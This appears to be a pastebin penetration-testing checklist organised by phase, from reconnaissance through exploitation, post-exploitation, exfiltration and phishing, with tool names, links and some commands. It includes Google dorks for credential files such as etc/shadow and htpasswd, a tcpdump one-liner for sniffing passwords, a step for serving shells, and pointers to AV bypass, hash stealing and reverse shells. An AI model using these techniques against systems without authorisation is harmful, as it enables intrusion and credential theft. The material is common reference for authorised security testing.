SHOW:
|
|
- or go back to the newest paste.
1 | - Reconnaissance | |
2 | - Passive/Semi-Passive | |
3 | - Third Party Resources | |
4 | - Locate Target Range | |
5 | - ARIN - https://www.arin.net/ | |
6 | - Fingerprint Domain/Website | |
7 | - Shodan - https://www.shodan.io/ | |
8 | - Censys - https://www.censys.io/ | |
9 | - Zoomeye - https://www.zoomeye.org | |
10 | - Netcraft - https://www.netcraft.com/ | |
11 | - Extended Network Information | |
12 | - Central Ops - https://centralops.net/co/DomainDossier.aspx | |
13 | - Robtex - https://www.robtex.net/ | |
14 | - Metasploit Scanning | |
15 | - auxiliary/scanner/* | |
16 | - portscan/tcp | |
17 | - http/http_version | |
18 | - http/tomcat_enum | |
19 | - http/trace_axd | |
20 | - Google - site:<result from above> filetype:axd OR inurl:trace.axd | |
21 | - Command Line Recon | |
22 | - Network Information | |
23 | - nslookup <target> | |
24 | - DNS cache snooping | |
25 | - dig <target> | |
26 | - Security Mechanisms | |
27 | - halberd | |
28 | - Metadata | |
29 | - exiftool | |
30 | - strings | |
31 | - strings -e b (big endian) OR -e l (little endian) | |
32 | - People Search | |
33 | - Yahoo People Search - http://itools.com/tool/yahoo-people-search | |
34 | - Switchboard - http://www.switchboard.com/person | |
35 | - Google Finance - https://www.google.com/finance | |
36 | - Zaba - http://www.zabasearch.com/ | |
37 | - Active | |
38 | - Command Line Recon Tools | |
39 | - General Recon | |
40 | - Recon-NG | |
41 | - Automated with https://github.com/jhaddix/domain | |
42 | - Domain/Subdomain Information | |
43 | - Fierce | |
44 | - The Harvester | |
45 | - Dirb | |
46 | - Dirbuster | |
47 | - Nmap | |
48 | - nmap -Pn -sSU -sV --top-ports 20 <target> | |
49 | - Create Custom Worldlist | |
50 | - cewl - https://digi.ninja/projects/cewl.php | |
51 | - wget - http://wiki.securityweekly.com/wiki/index.php/Episode129 | |
52 | - Software | |
53 | - FOCA | |
54 | - SPARTA | |
55 | - Maltego | |
56 | - Dirbuster | |
57 | - Browser Extensions | |
58 | - Chrome | |
59 | - Firefox | |
60 | - Safari | |
61 | - Google Searching | |
62 | - site:"target name" jobs,careers,openings,etc | |
63 | - intitle:"index of <Keyword>" | |
64 | - Keyword | |
65 | - .bash_history | |
66 | - etc/shadow | |
67 | - finances.xls(x) | |
68 | - htpasswd | |
69 | - inurl:maillog | |
70 | - site:*.edu filetype:*.bak OR <keyword> | |
71 | - Keyword | |
72 | - *.conf | |
73 | - *.backup | |
74 | - Enumeration | |
75 | - Internal | |
76 | - Scanning | |
77 | - Map Internal Network | |
78 | - Command Line Tools | |
79 | - arp -a | |
80 | - ip neigh show | |
81 | - smbtree -NS 2>/dev/null | |
82 | - nbtscan -r <current_IPrange> | |
83 | - netdiscover -r <current_IPrange> | |
84 | - nmap -n -Pn -T5 -sS <current_IPrange> | |
85 | - nmap NSE scripts | |
86 | - NFS | |
87 | - SMB | |
88 | - Pivoting | |
89 | - SSH Proxy Tunneling with Proxychain | |
90 | - http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html | |
91 | - External | |
92 | - Scanning | |
93 | - Nmap | |
94 | - Unicornscan | |
95 | - OneTwoPunch | |
96 | - Combines nmap and unicorn scan https://github.com/superkojiman/onetwopunch/blob/master/onetwopunch.sh | |
97 | - Exploitation | |
98 | - External | |
99 | - Web Vulnerability Scanners | |
100 | - Burp | |
101 | - https://portswigger.net/burp/ | |
102 | - My Guide: http://pastebin.com/nNHYP9Jd | |
103 | - Wapiti | |
104 | - http://wapiti.sourceforge.net/ | |
105 | - w3af | |
106 | - http://w3af.org/ | |
107 | - Nikto | |
108 | - https://cirt.net/Nikto2 | |
109 | - Framework | |
110 | - web2attack | |
111 | - https://github.com/santatic/web2attack | |
112 | - Command Line Tools | |
113 | - CMSmap | |
114 | - https://github.com/Dionach/CMSmap | |
115 | - WPscan | |
116 | - https://wpscan.org/ | |
117 | - Joomscan | |
118 | - https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project | |
119 | - Internal | |
120 | - LAN Attacks | |
121 | - Local Python Server - | |
122 | - Serve Shells/Exploits | |
123 | - Python -M SimpleHTTPServer <port> | |
124 | - LLMNR/NBT-NS Poisoning | |
125 | - Responder - https://github.com/SpiderLabs/Responder | |
126 | - Listen/respond to LLMNR NBTNS requests | |
127 | - Local Vulnerability Scanning | |
128 | - LinEnum- https://github.com/rebootuser/LinEnum | |
129 | - Unix-privesc-check | |
130 | - Linux_Exploit_Suggester | |
131 | - Comprehensive Linux Enumeration | |
132 | - http://www.rebootuser.com/?p=1623 | |
133 | - Bypass AV | |
134 | - PowerSploit - Python Powershell Shell | |
135 | - https://www.hackingloops.com/powersploit-quick-shell-for-penetration-testing/ | |
136 | - Download Files via Command Line | |
137 | - https://www.greyhathacker.net/?p=500 | |
138 | - Reverse Shells | |
139 | - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
140 | - https://highon.coffee/blog/reverse-shell-cheat-sheet/ | |
141 | - Attack Tools | |
142 | - Responder - https://github.com/SpiderLabs/Responder | |
143 | - SMBExec - https://github.com/pentestgeek/smbexec | |
144 | - WCE - http://www.darknet.org.uk/2015/02/windows-credentials-editor-wce-list-add-change-logon-sessions/ | |
145 | - Post-Exploitation | |
146 | - Comprehensive Wiki | |
147 | - http://pwnwiki.io/#!index.md | |
148 | - Pivoting | |
149 | - Stealing Hashes | |
150 | - WCE - http://www.darknet.org.uk/2015/02/windows-credentials-editor-wce-list-add-change-logon-sessions/ | |
151 | - Password Sniffing | |
152 | - Tcpdump | |
153 | - tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep –i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=||name=|name:|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line- | |
154 | - Ngrep | |
155 | - ngrep -q -W byline "GET|POST HTTP" | |
156 | - Dsniff | |
157 | - dsniff -m | |
158 | - Attack Frameworks/Tools | |
159 | - Empire | |
160 | - http://www.powershellempire.com/ | |
161 | - Armitage | |
162 | - http://blog.cobaltstrike.com/2016/05/25/raffis-abridged-guide-to-cobalt-strike/ | |
163 | - Privilege Escalation | |
164 | - PowerSploit - https://github.com/PowerShellMafia/PowerSploit | |
165 | - Download Files via Command Line | |
166 | - https://www.greyhathacker.net/?p=500 | |
167 | - Information Gathering | |
168 | - LinEnum - http://www.rebootuser.com/?p=1758 | |
169 | - Exfiltration | |
170 | - Detection Capabilities | |
171 | - Egress-Assess | |
172 | - https://github.com/ChrisTruncer/Egress-Assess | |
173 | - Outbound Port Detection (find unfiltered outbound connections) | |
174 | - http://www.floyd.ch/?p=352 | |
175 | - Network Exfiltration | |
176 | - Phishing | |
177 | - Important: Immediately pivot from initial host | |
178 | - Tools | |
179 | - Empire | |
180 | - https://enigma0x3.net/2016/03/15/phishing-with-empire/ | |
181 | - Gophish | |
182 | - https://github.com/gophish/gophish | |
183 | - Initial Access Techniques | |
184 | - Office Macros | |
185 | - Tools for Internal Use | |
186 | - PowerView - stealuserhunter | |
187 | - Misc. | |
188 | - Find Exploits | |
189 | - Linux | |
190 | - Command line | |
191 | - searchsploit -e Windows 7 | |
192 | - searchsploit windows 2007 | grep -i local | |
193 | - Web | |
194 | - Exploit-db | |
195 | - https://www.exploit-db.com/ | |
196 | - Packet Storm | |
197 | - https://packetstormsecurity.com/files/tags/exploit | |
198 | - Various Automation | |
199 | - https://github.com/leebaird/discover |